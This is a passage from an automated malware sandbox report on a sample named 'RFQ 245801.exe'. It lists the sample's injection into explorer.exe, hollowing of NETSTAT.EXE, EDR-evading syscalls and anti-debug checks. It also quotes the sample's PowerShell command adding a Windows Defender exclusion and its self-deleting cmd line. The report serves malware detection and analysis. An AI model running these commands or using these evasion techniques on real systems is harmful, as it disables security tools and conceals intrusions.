Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F4B00 mov eax, dword ptr fs:[00000030h] 5_2_017F4B00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h] 5_2_01728BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h] 5_2_01728BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h] 5_2_01728BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174EBFC mov eax, dword ptr fs:[00000030h] 5_2_0174EBFC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017ACBF0 mov eax, dword ptr fs:[00000030h] 5_2_017ACBF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CEBD0 mov eax, dword ptr fs:[00000030h] 5_2_017CEBD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h] 5_2_01740BCB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h] 5_2_01740BCB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h] 5_2_01740BCB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h] 5_2_01720BCD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h] 5_2_01720BCD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h] 5_2_01720BCD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h] 5_2_01730BBE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h] 5_2_01730BBE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h] 5_2_017D4BB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h] 5_2_017D4BB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h] 5_2_0179CA72
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h] 5_2_0179CA72
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h] 5_2_0175CA6F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h] 5_2_0175CA6F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h] 5_2_0175CA6F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CEA60 mov eax, dword ptr fs:[00000030h] 5_2_017CEA60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h] 5_2_01730A5B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h] 5_2_01730A5B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h] 5_2_01744A35
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h] 5_2_01744A35
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA24 mov eax, dword ptr fs:[00000030h] 5_2_0175CA24
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174EA2E mov eax, dword ptr fs:[00000030h] 5_2_0174EA2E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017ACA11 mov eax, dword ptr fs:[00000030h] 5_2_017ACA11
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h] 5_2_0175AAEE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h] 5_2_0175AAEE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720AD0 mov eax, dword ptr fs:[00000030h] 5_2_01720AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h] 5_2_01754AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h] 5_2_01754AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h] 5_2_01776ACC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h] 5_2_01776ACC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h] 5_2_01776ACC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h] 5_2_01728AA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h] 5_2_01728AA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776AA4 mov eax, dword ptr fs:[00000030h] 5_2_01776AA4
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01758A90 mov edx, dword ptr fs:[00000030h] 5_2_01758A90
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h] 5_2_0172EA80
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00642167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree, 7_2_00642167
Enables debug privileges
Source: C:\Users\user\Desktop\RFQ 245801.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00645DC0 SetUnhandledExceptionFilter, 7_2_00645DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00645C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00645C30
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\RFQ 245801.exe NtQueueApcThread: Indirect: 0x1B9A4F2 Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe NtClose: Indirect: 0x1B9A56C
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory written: C:\Users\user\Desktop\RFQ 245801.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\RFQ 245801.exe Thread register set: target process: 2580 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 2580 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\RFQ 245801.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\RFQ 245801.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 640000 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe 7_2_006438D2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe" Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_006458B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 7_2_006458B6
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4150770824.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.4142888075.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Users\user\Desktop\RFQ 245801.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
